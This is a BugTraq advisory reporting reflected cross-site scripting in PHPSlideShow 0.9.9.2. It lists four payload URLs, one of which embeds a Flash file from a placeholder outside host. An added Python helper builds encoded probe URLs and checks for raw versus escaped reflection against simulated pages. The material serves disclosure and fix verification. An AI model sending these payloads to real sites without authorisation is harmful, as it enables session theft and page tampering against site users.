BugTraq
PHPSlideShow XSS Update Nov 27 2007 09:16PM
morin josh gmail com
Vendor Site: http://www.zinkwazi.com/wp/scripts/

Version affected: 0.9.9.2

URL: http://www.example.com/scripts/demo/phpslideshow.php?directory=photos

BID ref: 26576 By Jose Luis Góngora Fernández

PHPSlideShow is also susceptible to the following inputs:

1. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><iframe>

2. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html>

3. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf"

4. http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E

Discovered by: Joshua Morin

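The four payloads above are all reflected-XSS probes against the same GET parameter. The script below is an added example, not PHPSlideShow code and not part of the original post: it builds correctly URL-encoded probe URLs for each payload and classifies a captured response body as reflecting the payload raw (unescaped, the bug class reported), HTML-escaped, or not at all. The hostname and path are taken from the advisory; `simulate_vulnerable` and `simulate_fixed` are constructed stand-ins for a page that echoes `directory` into an attribute and a heading, used only so the check runs offline.

```python
"""Offline helper for confirming a reflected-XSS finding in a GET parameter.

Added example; not PHPSlideShow's code. The four payloads are the ones
listed in the advisory. Response bodies are constructed here so the
check runs without a network target.
"""
from html import escape
from urllib.parse import parse_qs, urlencode, urlsplit

# Target URL from the advisory (the host is the advisory's placeholder).
BASE = "http://www.yoursite.com/scripts/demo/phpslideshow.php"
PARAM = "directory"

# Decoded forms of the four payloads in the advisory.
PAYLOADS = {
    "attr_breakout": '"><iframe>',
    "html_block": '<html><font color="Red"><b>Pwned</b></font></html>',
    "embed_flash": '<EMBED SRC="http://site.com/xss.swf"',
    "form_hijack": 'FORM ACTION="search.php" METHOD="GET">',
}


def probe_url(payload, base=BASE, param=PARAM):
    """Build the probe URL with the payload properly percent-encoded."""
    return f"{base}?{urlencode({param: payload})}"


def decoded_param(url, param=PARAM):
    """Recover the decoded parameter value from a probe URL (round-trip check)."""
    return parse_qs(urlsplit(url).query)[param][0]


def classify_reflection(body, payload):
    """'raw' if the payload appears verbatim (exploitable reflection),
    'escaped' if only its HTML-escaped form appears, 'none' otherwise."""
    if payload in body:
        return "raw"
    if escape(payload, quote=True) in body:
        return "escaped"
    return "none"


def simulate_vulnerable(directory):
    """Constructed stand-in (hypothetical): echoes the parameter into an
    href attribute and a heading with no output encoding."""
    return (f'<a href="?directory={directory}">{directory}</a>'
            f'<h2>{directory}</h2>')


def simulate_fixed(directory):
    """Same page with output encoding applied to every reflection point
    (the PHP equivalent is htmlspecialchars($dir, ENT_QUOTES))."""
    d = escape(directory, quote=True)
    return f'<a href="?directory={d}">{d}</a><h2>{d}</h2>'


def run_checks():
    """Classify every payload against the vulnerable and fixed responses."""
    results = {}
    for name, payload in PAYLOADS.items():
        url = probe_url(payload)
        assert decoded_param(url) == payload  # encoding round-trips
        results[name] = (
            classify_reflection(simulate_vulnerable(payload), payload),
            classify_reflection(simulate_fixed(payload), payload),
        )
    return results


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "->", probe_url(payload))
    for name, (vuln, fixed) in run_checks().items():
        print(f"{name}: vulnerable={vuln} fixed={fixed}")
```

Against a live target, replace the simulated bodies with the actual HTTP response and feed it to `classify_reflection`. A result of `escaped` on every payload is what a fix should produce; note that payload 1 only matters where the value lands inside a quoted attribute, and payload 4 (no leading `<`) relies on the page already emitting one before the value.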
